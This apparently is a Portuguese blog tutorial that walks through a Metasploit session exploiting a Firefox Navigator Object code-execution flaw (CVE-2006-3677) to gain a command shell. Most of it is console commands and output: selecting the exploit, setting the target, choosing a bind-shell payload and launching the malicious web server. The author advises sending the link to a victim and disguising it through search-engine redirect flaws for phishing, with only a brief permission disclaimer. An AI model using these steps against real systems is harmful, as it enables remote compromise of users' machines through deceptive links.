# ./msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ msf v3.1-dev
+ -- --=[ 216 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 40 aux
msf >
Para listar os exploits ,
msf > show exploits
Exploits
========
Name Description
---- -----------
bsdi/softcart/mercantec_softcart Mercantec SoftCart CGI Overflow
hpux/lpd/cleanup_exec HP-UX LPD Command Execution
irix/lpd/tagprinter_exec Irix LPD tagprinter Command Execution
linux/games/ut2004_secure Unreal Tournament 2004 "secure" Overflow (Linux)
linux/http/peercast_url PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)
linux/ids/snortbopre Snort Back Orifice Pre-Preprocessor Remote Exploit
linux/madwifi/madwifi_giwscan_cb Madwifi SIOCGIWSCAN Buffer Overflow
linux/misc/interbase_create Borland Interbase 2007 Create Request Buffer Overflow
linux/pptp/poptop_negative_read Poptop Negative Read Overflow
linux/proxy/squid_ntlm_authenticate Squid NTLM Authenticate Overflow
linux/samba/lsa_transnames_heap Samba lsa_io_trans_names Heap Overflow
multi/browser/firefox_queryinterface Firefox location.QueryInterface() Code Execution
multi/browser/mozilla_compareto Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
multi/browser/mozilla_navigatorjava Mozilla Suite/Firefox Navigator Object Code Execution
Coletando infos do exploit a ser usado
msf > info multi/browser/mozilla_navigatorjava
Name: Mozilla Suite/Firefox Navigator Object Code Execution
Version: 4646
Platform:
Privileged: No
License: Metasploit Framework License
Provided by:
hdm
Available targets:
Id Name
-- ----
0 Firefox 1.5.0.4 Windows x86
1 Firefox 1.5.0.4 Linux x86
2 Firefox 1.5.0.4 Mac OS X PPC
3 Firefox 1.5.0.4 Mac OS X x86
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 512
Avoid: 0 characters
Description:
This module exploits a code execution vulnerability in the Mozilla
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This
exploit requires the Java plugin to be installed.
References:
http://www.securityfocus.com/bid/19192
http://www.osvdb.org/27559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-3677
http://www.mozilla.org/security/announce/mfsa2006-45.html
http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html
msf >
selecionando o Exploit
msf > use multi/browser/mozilla_navigatorjava
msf exploit(mozilla_navigatorjava) >
No info foi informado que temos varios target (alvos), selecionarei o 1
msf exploit(mozilla_navigatorjava) > set TARGET 1
TARGET => 1
msf exploit(mozilla_navigatorjava) >
No caso como vimos no info acima, voce pode ou nao setar o SRVHOST,SRVPORT e URIPATH. Como exemplo usarei o URIPATH
msf exploit(mozilla_navigatorjava) > set URIPATH spooker
URIPATH => spooker
msf exploit(mozilla_navigatorjava) > set
Global
======
No entries in data store.
Module: multi/browser/mozilla_navigatorjava
===========================================
Name Value
---- -----
HTML::base64 none
HTML::javascript::escape 0
HTML::unicode none
HTTP::chunked false
HTTP::compression none
HTTP::header_folding false
HTTP::junk_headers false
SRVHOST 0.0.0.0
SRVPORT 8080
TCP::max_send_size 0
TCP::send_delay 0
URIPATH spooker
msf exploit(mozilla_navigatorjava) >
Agora temos que selecionar o PAYLOAD, vamos listar para ver algo que nos interesse.
msf exploit(mozilla_navigatorjava) > show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inline
msf exploit(mozilla_navigatorjava) >
Basta agora setar o payload e depois executar.
msf exploit(mozilla_navigatorjava) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(mozilla_navigatorjava) > exploit
[*] Using URL: http://0.0.0.0:8080/spooker
[*] Local IP: http://192.168.5.139:8080/spooker
[*] Server started.
[*] Exploit running as background job.
msf exploit(mozilla_navigatorjava) >
Basta no caso para o link para o alvo que queira a shell. Lembrando que isso nao deve ser usado sem permissoes, use o de forma educativa. Caso queiram tambem podem mesclar com as falhas de grandes search como yahoo, google, e apontar pra sua maquina (Olhem o post sobre Phishing for pentests ) .
Quando alguem conectar aparecera
msf exploit(mozilla_navigatorjava) >
[*] Sending exploit to 192.168.5.138:60864...
[*] Started bind handler
Site: http://www.metasploit.org/
[]z e usem com cuidado.
Nenhum comentário:
Postar um comentário